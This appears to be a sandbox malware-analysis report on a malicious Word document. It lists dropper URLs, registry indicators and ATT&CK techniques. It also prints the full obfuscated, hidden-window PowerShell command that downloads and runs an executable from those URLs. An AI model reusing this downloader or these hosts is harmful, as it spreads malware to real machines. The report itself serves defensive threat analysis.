51c1db80e21059cffa913be9036be7f2fcced009dac34d429d308064659669e2

General

Target

51c1db80e21059cffa913be9036be7f2fcced009dac34d429d308064659669e2
Sample

191220-a3w4k8srkx
SHA256

51c1db80e21059cffa913be9036be7f2fcced009dac34d429d308064659669e2

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://www.wangjy1211.xyz/wp-includes/bmzb-f0vjim4w-5277909/

exe.dropper

https://www.compelconsultancy.com/2ic0/lNeMPamsg/

exe.dropper

http://www.acgvideo.co/cache/rzvKsqUX/

exe.dropper

http://www.smdelectro.com/alfacgiapi/fkq-lke7btj-80091/

exe.dropper

https://www.air-pegasus.com/sips/ADcnKLXD/

Signatures

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4964	WINWORD.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4964	WINWORD.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4964	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3740	5040	Powershell.exe	73

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3740	Powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3740	Powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\51c1db80e21059cffa913be9036be7f2fcced009dac34d429d308064659669e2.doc" /o ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4964

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABMAGgAeQB0AHIAeQByAHQAcQBhAHkAPQAnAEwAZQB0AHoAeABkAHQAegBzAGwAJwA7ACQATgBkAGoAdQBjAGcAaABrAGEAIAA9ACAAJwA5ADMAMwAnADsAJABWAGQAZQBtAHcAdgB3AG4AdwBhAD0AJwBHAHQAawBkAHIAZQBvAHIAeQBpACcAOwAkAEQAaABoAGcAZwB5AHIAYwB3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAGQAagB1AGMAZwBoAGsAYQArACcALgBlAHgAZQAnADsAJABJAG4AeABvAHEAcwB2AGEAagBoAGQAPQAnAEQAZABjAHAAeABwAGQAawBuAHEAawAnADsAJABXAGQAbQBtAHkAawBoAGwAbwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAJwArACcAZQBjAHQAJwApACAATgBFAHQALgB3AGUAQgBjAEwAaQBlAG4AdAA7ACQATABpAHYAcQBuAHQAbAB6AGYAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB3AGEAbgBnAGoAeQAxADIAMQAxAC4AeAB5AHoALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBiAG0AegBiAC0AZgAwAHYAagBpAG0ANAB3AC0ANQAyADcANwA5ADAAOQAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYwBvAG0AcABlAGwAYwBvAG4AcwB1AGwAdABhAG4AYwB5AC4AYwBvAG0ALwAyAGkAYwAwAC8AbABOAGUATQBQAGEAbQBzAGcALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBhAGMAZwB2AGkAZABlAG8ALgBjAG8ALwBjAGEAYwBoAGUALwByAHoAdgBLAHMAcQBVAFgALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBzAG0AZABlAGwAZQBjAHQAcgBvAC4AYwBvAG0ALwBhAGwAZgBhAGMAZwBpAGEAcABpAC8AZgBrAHEALQBsAGsAZQA3AGIAdABqAC0AOAAwADAAOQAxAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBhAGkAcgAtAHAAZQBnAGEAcwB1AHMALgBjAG8AbQAvAHMAaQBwAHMALwBBAEQAYwBuAEsATABYAEQALwAnAC4AIgBTAFAAYABMAEkAVAAiACgAJwAqACcAKQA7ACQAQQBoAGoAcwBsAG0AZQBxAGUAagB5AGkAdwA9ACcASABjAHoAcQB2AG8AbgBhAG0AJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAdwBiAHEAbABuAHQAcABmAGwAdQBoACAAaQBuACAAJABMAGkAdgBxAG4AdABsAHoAZgApAHsAdAByAHkAewAkAFcAZABtAG0AeQBrAGgAbABvAC4AIgBkAE8AdwBgAE4AbABgAE8AYQBEAEYAaQBgAGwAZQAiACgAJABWAHcAYgBxAGwAbgB0AHAAZgBsAHUAaAAsACAAJABEAGgAaABnAGcAeQByAGMAdwApADsAJABUAHUAYwB2AHcAbgBmAHUAPQAnAFEAcQB2AHEAagB4AHkAdABlAGcAYQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEQAaABoAGcAZwB5AHIAYwB3ACkALgAiAGwAYABFAG4AZwB0AEgAIgAgAC0AZwBlACAAMgA4ADgANwA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAcgBUACIAKAAkAEQAaABoAGcAZwB5AHIAYwB3ACkAOwAkAEsAcgB1AG4AaQBuAGcAeAA9ACcAVABrAG4AagBuAGwAZABjAGwAcgAnADsAYgByAGUAYQBrADsAJABEAHoAbQBxAG8AZwBoAHYAYgBpAD0AJwBLAGUAdABzAGwAZQBnAHQAegBsAHcAegBrACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAZAB5AHoAaABsAHkAbgB1AD0AJwBZAHoAcAB2AGkAbABvAG4AegBqAHMAawAnAA==
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3740

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4964-2-0x000002AA0203A000-0x000002AA02043000-memory.dmp

Filesize
36KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads